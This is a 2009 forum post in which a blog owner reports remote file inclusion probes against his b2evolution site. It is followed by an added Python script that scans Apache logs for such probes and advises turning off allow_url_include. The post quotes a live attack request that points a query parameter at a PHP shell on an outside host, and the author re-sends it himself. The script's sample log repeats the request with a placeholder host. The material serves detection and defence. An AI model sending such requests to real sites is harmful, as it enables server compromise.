
Apr 24, 2009 08:01

Upon examining my Apache access log, I came upon four (4) entries, similar to the one below, from the IP address 151.67.229.188:

151.67.229.188 - - [23/Apr/2009:04:24:42 -0700] "GET /blog/index.php?lk=http://r00t32.altervista.org/shell.txt HTTP/1.1" 200 66005 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 1.1.4322; InfoPath.2)"

Upon blocking the IP address and sending a complaint to the ISP of the cracker, I proceeded to use the wget utility to download the shell.txt from the altervista.org nest.

Upon opening the shell.txt in my text editor, it can be seen (as I suspected based on other similar but less vicious attacks) that it is actually a PHP script with references to a cracker of the name:
* FullFreeez
* Panzera Security Blog and OpenCosmo Security Team

I did not notice failure entries in the Apache error log file; hence, though apparently the cracker successfully processed the files under attack (web server response 200), my b2evolution seems to have withstood the vicious hijacking attempt.

To confirm the previous, I recreated the attack against my blog site and all I could see was b2evolution displaying the usual unmodified content. However, I cannot know if any data was sent to the cracker by the PHP script/shell shell.txt referenced above. Below is my Apache access log entry for my own attack recreation:

my.IP.addr.ess - - [23/Apr/2009:22:52:31 -0700] "GET /blog/index.php?lk=http://r00t32.altervista.org/shell.txt HTTP/1.1" 200 66005 "-" "Mozilla/5.0 (X11; U; Linux i686; en; rv:1.9.0.8) Gecko/20080528 Epiphany/2.22 (Debian/2.24.3-2)"

Do any of you have comments/suggestions to enhance b2evolution security against these vicious crack attempts?
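The log entries in the post are remote file inclusion (RFI) probes: a query parameter (here `lk`) carrying a full `http://` URL to a script hosted elsewhere, in the hope that the target PHP code passes that parameter to `include()` or `require()`. The following Python script is an added example, not code from the post or from b2evolution: it parses Apache "combined" log lines, flags any query parameter whose value is an absolute remote URL (including percent-encoded ones), and counts probes per source address so the operator knows what to block or report. The log lines, host names and IP addresses inside it are constructed for the example and are not taken from the post.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache "combined" log format:
#   host ident user [time] "method target proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# URL schemes that, when passed to include()/require() with allow_url_include
# enabled, make PHP fetch and execute code from another host.
REMOTE_SCHEMES = ("http", "https", "ftp", "ftps")


def parse_line(line):
    """Split one combined-format line into named fields; None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def rfi_indicators(target):
    """Return (param, value) pairs whose value is an absolute remote URL."""
    hits = []
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl already decodes one layer of percent-encoding; a second
        # unquote catches double-encoded values.
        decoded = unquote(value)
        parts = urlsplit(decoded)
        if parts.scheme.lower() in REMOTE_SCHEMES and parts.netloc:
            hits.append((name, decoded))
    return hits


def scan(lines):
    """Return one finding per log line that carries a remote URL in its query string."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # not a combined-format line (or a mangled one); skip it
        hits = rfi_indicators(rec["target"])
        if hits:
            findings.append({
                "host": rec["host"],
                "time": rec["time"],
                "status": int(rec["status"]),
                "path": urlsplit(rec["target"]).path,
                "params": hits,
            })
    return findings


def summarize(findings):
    """Count flagged requests per source address (what to block or report)."""
    counts = {}
    for f in findings:
        counts[f["host"]] = counts.get(f["host"], 0) + 1
    return counts


# Constructed sample log (not the post's real entries): two probes from one
# address, the second percent-encoded, followed by two benign requests.
SAMPLE_LOG = [
    '203.0.113.7 - - [23/Apr/2009:04:24:42 -0700] "GET /blog/index.php?lk=http://rfi-host.example/shell.txt HTTP/1.1" 200 66005 "-" "Mozilla/4.0 (compatible; MSIE 7.0)"',
    '203.0.113.7 - - [23/Apr/2009:04:24:43 -0700] "GET /blog/index.php?lk=http%3A%2F%2Frfi-host.example%2Fshell.txt HTTP/1.1" 200 66005 "-" "Mozilla/4.0 (compatible; MSIE 7.0)"',
    '198.51.100.9 - - [23/Apr/2009:04:30:00 -0700] "GET /blog/index.php?p=12 HTTP/1.1" 200 14521 "-" "Mozilla/5.0 (X11; Linux)"',
    '198.51.100.9 - - [23/Apr/2009:04:31:00 -0700] "GET /blog/index.php?redirect_to=/blog/ HTTP/1.1" 302 0 "-" "Mozilla/5.0 (X11; Linux)"',
]


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for f in results:
        print(f"{f['host']} {f['time']} {f['path']} status={f['status']} params={f['params']}")
    print("probes per source:", summarize(results))
```

A 200 response in the log, as the post notes, only tells you the request reached the script; it does not tell you whether the remote file was fetched or executed. A finding from this scan is a reason to check that the application never passes request parameters to `include()`/`require()`, and that `allow_url_include` is off in `php.ini`, which makes PHP refuse to include `http://`/`ftp://` URLs regardless of what the application does.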
